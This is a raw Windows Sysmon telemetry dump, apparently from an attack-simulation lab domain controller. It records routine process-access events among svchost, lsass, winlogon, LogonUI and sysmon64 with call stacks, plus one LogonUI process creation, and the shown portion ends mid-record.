10341000x80000000000000009757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-93F6-6005-E704-00000000A301}45723808C:\Windows\system32\winlogon.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.420{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3a74055 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e72SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000009740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.414{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.399{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.399{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.399{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.399{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 